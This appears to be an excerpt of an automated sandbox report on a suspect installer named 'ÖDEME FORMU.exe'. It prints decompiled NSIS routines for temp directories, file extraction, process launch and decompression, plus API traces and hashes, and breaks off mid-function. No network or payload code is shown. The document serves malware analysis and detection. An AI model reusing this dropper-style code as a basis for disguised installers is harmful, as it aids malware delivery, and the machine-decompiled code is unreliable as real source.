				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E00402A85(0xfffffff0);
				_t10 = E0040567B(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E00405612(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405AF4("C:\\Users\\hardz\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

0x004015bb
0x004015c2
0x004015c5
0x004015ca
0x004015ce
0x004015d0
0x004015d8
0x004015de
0x004015e0
0x004015e3
0x004015eb
0x004015f8
0x00401605
0x00401605
0x004015fa
0x004015fb
0x00401603
0x00000000
0x00000000
0x00401603
0x004015f8
0x00401608
0x0040160b
0x0040160d
0x0040160e
0x004015d0
0x00401615
0x00401635
0x004021ba
0x00401617
0x00401619
0x00401624
0x0040162a
0x0040162a
0x0040291d
0x00402929

APIs

Part of subcall function 0040567B: CharNextA.USER32(:T@,"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" ,C:\,?,004056DF,C:\,C:\,?,"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" ,7620F560,0040543A,?,7620F560,00000000), ref: 00405689
Part of subcall function 0040567B: CharNextA.USER32(00000000), ref: 0040568E
Part of subcall function 0040567B: CharNextA.USER32(00000000), ref: 0040569D

CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015FB
SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040162A

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 0040161F

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 3751793516-501415292
Opcode ID: ac794f138ba7f61467d4ebe51835dd724794318f642f069794646da26921047b
Instruction ID: 63bcb5d4f1e8c965e9b2f85ce20a33f9a17abe043d5819b309257051beb803d0
Opcode Fuzzy Hash: ac794f138ba7f61467d4ebe51835dd724794318f642f069794646da26921047b
Instruction Fuzzy Hash: B9012B31908050ABDB216F755D4497F3774DA55325B28063FF4D2B32E2D63C0D42962E

Uniqueness

Uniqueness Score: -1.00%

Function 004057FA Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004057FA(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}

0x004057fe
0x00405804
0x00405805
0x00405805
0x00405806
0x0040580d
0x00405817
0x00405824
0x00405827
0x0040582f
0x00000000
0x00000000
0x00405833
0x00000000
0x00000000
0x00405835
0x00000000
0x00405835
0x00000000

APIs

GetTickCount.KERNEL32 ref: 0040580D
GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405827

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004057FA, 004057FD
nsa, xrefs: 00405806
"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" , xrefs: 00405801

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\#U00d6DEME FORMU.exe" $C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-48240162
Opcode ID: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
Instruction ID: 2f33edf353eb26188edb3eebd43b66705c4d1fe0bdf9ced7dfec13a37dcb2b50
Opcode Fuzzy Hash: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
Instruction Fuzzy Hash: 5BF0A037748248BAE7105E55EC04B9B7F9DDF91760F14C02BFE089A1C0D6B09968CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00402F71 Relevance: 7.6, APIs: 5, Instructions: 109
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00402F71(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				void _t31;
				intOrPtr _t32;
				int _t35;
				long _t36;
				int _t37;
				long _t38;
				int _t40;
				int _t42;
				long _t43;
				long _t44;
				intOrPtr _t51;
				long _t55;
				long _t57;

				_t31 = _a4;
				if(_t31 >= 0) {
					_t51 =  *0x423f78; // 0x16c4
					_t44 = _t31 + _t51;
					 *0x4170d4 = _t44;
					SetFilePointer( *0x409024, _t44, 0, 0); // executed
				}
				_t57 = 4;
				_t32 = E0040309C(_t57);
				if(_t32 >= 0) {
					_t35 = ReadFile( *0x409024,  &_a4, _t57,  &_v8, 0); // executed
					if(_t35 == 0 || _v8 != _t57) {
						L23:
						_push(0xfffffffd);
						goto L24;
					} else {
						 *0x4170d4 =  *0x4170d4 + _t57;
						_t32 = E0040309C(_a4);
						_v12 = _t32;
						if(_t32 >= 0) {
							if(_a12 != 0) {
								_t36 = _a4;
								if(_t36 >= _a16) {
									_t36 = _a16;
								}
								_t37 = ReadFile( *0x409024, _a12, _t36,  &_v8, 0); // executed
								if(_t37 == 0) {
									goto L23;
								} else {
									_t38 = _v8;
									 *0x4170d4 =  *0x4170d4 + _t38;
									_v12 = _t38;
									goto L22;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t32 = _v12;
								} else {
									while(1) {
										_t55 = 0x4000;
										if(_a4 < 0x4000) {
											_t55 = _a4;
										}
										_t40 = ReadFile( *0x409024, 0x413090, _t55,  &_v8, 0); // executed
										if(_t40 == 0 || _t55 != _v8) {
											goto L23;
										}
										_t42 = WriteFile(_a8, 0x413090, _v8,  &_a16, 0); // executed
										if(_t42 == 0 || _a16 != _t55) {
											_push(0xfffffffe);
											L24:
											_pop(_t32);
										} else {
											_t43 = _v8;
											_v12 = _v12 + _t43;
											_a4 = _a4 - _t43;
											 *0x4170d4 =  *0x4170d4 + _t43;
											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L25;
									}
									goto L23;
								}
							}
						}
					}
				}
				L25:
				return _t32;
			}

0x00402f76
0x00402f80
0x00402f82
0x00402f89
0x00402f8d
0x00402f98
0x00402f98
0x00402fa0
0x00402fa2
0x00402fa9
0x00402fc5
0x00402fc9
0x00403092
0x00403092
0x00000000
0x00402fd8
0x00402fdb
0x00402fe1
0x00402fe8
0x00402feb
0x00402ff4
0x00403061
0x00403067
0x00403069
0x00403069
0x0040307b
0x0040307f
0x00000000
0x00403081
0x00403081
0x00403084
0x0040308a
0x00000000
0x0040308a
0x00402ff6
0x00402ff9
0x0040308d
0x0040308d
0x00402fff
0x00403004
0x00403004
0x0040300c
0x0040300e
0x0040300e
0x0040301f
0x00403023
0x00000000
0x00000000
0x00403037
0x0040303f
0x0040305d
0x00403094
0x00403094
0x00403046
0x00403046
0x00403049
0x0040304c
0x0040304f
0x00403059
0x00000000
0x0040305b
0x00000000
0x0040305b
0x00403059
0x00000000
0x0040303f
0x00000000
0x00403004
0x00402ff9
0x00402ff4
0x00402feb
0x00402fc9
0x00403095
0x00403099

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000020,00000020,?,00402F1D,000000FF,00000000,00000000,?,00007DE4), ref: 00402F98
ReadFile.KERNELBASE(?,00000004,00007DE4,00000000,00000004,00000000,00000000,00000000,00000020,00000020,?,00402F1D,000000FF,00000000,00000000,?), ref: 00402FC5
ReadFile.KERNELBASE(00413090,00004000,00007DE4,00000000,?,?,00402F1D,000000FF,00000000,00000000,?,00007DE4), ref: 0040301F
WriteFile.KERNELBASE(00000000,00413090,00007DE4,000000FF,00000000,?,00402F1D,000000FF,00000000,00000000,?,00007DE4), ref: 00403037

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: File$Read$PointerWrite
String ID:
API String ID: 2113905535-0
Opcode ID: 85f9b32b3f954e73cf89dba4bc253831fee770f0b6474c0430461d584885da6e
Instruction ID: 921f3f76ada69b898c24bbee4c45453848788fed2ed6be28b521a649f4e8a62f
Opcode Fuzzy Hash: 85f9b32b3f954e73cf89dba4bc253831fee770f0b6474c0430461d584885da6e
Instruction Fuzzy Hash: 31313A31901209FBDF21CF65DD44AAE7FBCEB45365F20843BFA04A6194D2349E40DB69

Uniqueness

Uniqueness Score: -1.00%

Function 004056C8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E004056C8(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00405AF4(0x421938, _a4);
				_t21 = E0040567B(0x421938);
				if(_t21 != 0) {
					E00405D03(_t21);
					if(( *0x423f30 & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x421938;
						while(1) {
							_t11 = lstrlenA(0x421938);
							_push(0x421938);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E00405D9C();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E0040562E(0x421938);
								continue;
							} else {
								goto L1;
							}
						}
						E004055E7();
						_t16 = GetFileAttributesA(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x004056d4
0x004056df
0x004056e3
0x004056ea
0x004056f6
0x00405702
0x00405702
0x0040571a
0x0040571b
0x00405722
0x00405723
0x00000000
0x00000000
0x00405706
0x0040570d
0x00405715
0x00000000
0x00000000
0x00000000
0x00000000
0x0040570d
0x00405725
0x0040572b
0x00000000
0x00405739
0x004056f8
0x004056fc
0x00000000
0x00000000
0x00000000
0x00000000
0x004056fc
0x004056e5
0x00000000

APIs

Part of subcall function 00405AF4: lstrcpynA.KERNEL32(?,?,00000400,00403351,fjvkkubvvke Setup,NSIS Error), ref: 00405B01

Part of subcall function 0040567B: CharNextA.USER32(:T@,"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" ,C:\,?,004056DF,C:\,C:\,?,"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" ,7620F560,0040543A,?,7620F560,00000000), ref: 00405689
Part of subcall function 0040567B: CharNextA.USER32(00000000), ref: 0040568E
Part of subcall function 0040567B: CharNextA.USER32(00000000), ref: 0040569D

lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,?,"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" ,7620F560,0040543A,?,7620F560,00000000), ref: 0040571B
GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" ,7620F560,0040543A,?,7620F560,00000000), ref: 0040572B

Strings

C:\, xrefs: 004056CE, 004056D3, 004056D9, 00405714, 0040571A, 00405722, 0040572A
"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" , xrefs: 004056C9

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: "C:\Users\user\Desktop\#U00d6DEME FORMU.exe" $C:\
API String ID: 3248276644-3509748422
Opcode ID: d7a6fd6b08d9551768931ca80393006ad21f6be298864b6a11b3b7159a130088
Instruction ID: c9a5ad2ab4ff501f0e3d3fb61e1c810f238de096eca0db9d00b0265de3cbf42b
Opcode Fuzzy Hash: d7a6fd6b08d9551768931ca80393006ad21f6be298864b6a11b3b7159a130088
Instruction Fuzzy Hash: 81F04C25116D5152C72233392C09AAF1755CE9632CB48093BF865B22E2DB3D8803ED7E

Uniqueness

Uniqueness Score: -1.00%

Function 00405361 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405361(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x422538->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x422538,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x0040536a
0x00405386
0x0040538e
0x00405393
0x00000000
0x00405399
0x0040539d

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422538,Error launching installer), ref: 00405386
CloseHandle.KERNEL32(?), ref: 00405393

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405361
Error launching installer, xrefs: 00405374

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
API String ID: 3712363035-2984075973
Opcode ID: 95266c0028550c5be94e5f06544d2cc5b2c8f5817e632bf3c1e547dcfbef7da9
Instruction ID: 4b3b5e29b82f538c1f6189d2f0b4571506454f650d891e3160212e6729b48b77
Opcode Fuzzy Hash: 95266c0028550c5be94e5f06544d2cc5b2c8f5817e632bf3c1e547dcfbef7da9
Instruction Fuzzy Hash: 9AE012B4A00209BFDB00EF64ED49E6FBBBCFB10344F808571B914F2151D7B8E9508A69

Uniqueness

Uniqueness Score: -1.00%

Function 004032C6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E004032C6(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
				E00405D03(_t6);
				_t2 = E00405654(_t6);
				if(_t2 != 0) {
					E004055E7(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E004057FA("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}

0x004032c7
0x004032cd
0x004032d3
0x004032da
0x004032df
0x004032e7
0x004032f3
0x004032f9
0x004032dd
0x004032dd
0x004032dd

APIs

Part of subcall function 00405D03: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004032D2,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 00405D5B
Part of subcall function 00405D03: CharNextA.USER32(?,?,?,00000000), ref: 00405D68
Part of subcall function 00405D03: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004032D2,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 00405D6D
Part of subcall function 00405D03: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004032D2,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 00405D7D

CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 004032E7

Strings

1033, xrefs: 004032EE
C:\Users\user\AppData\Local\Temp\, xrefs: 004032C7, 004032CC, 004032D2, 004032DE, 004032E6, 004032ED

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 4115351271-1075807775
Opcode ID: c49a4ae33f7a441e05ad4f45e3ad89d0cea47cd121eda0228c9a518e283b1627
Instruction ID: d6c3561ce191540899b591fc5212b2685f70515619ba473533d6486adf82dab9
Opcode Fuzzy Hash: c49a4ae33f7a441e05ad4f45e3ad89d0cea47cd121eda0228c9a518e283b1627
Instruction Fuzzy Hash: 6BD0C911656D3072C9523B2A3D0AFCF150C8F5631AF5180BBF908B90C64B6C6A8319EF

Uniqueness

Uniqueness Score: -1.00%

Function 004064B8 Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E004064B8() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00406926))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
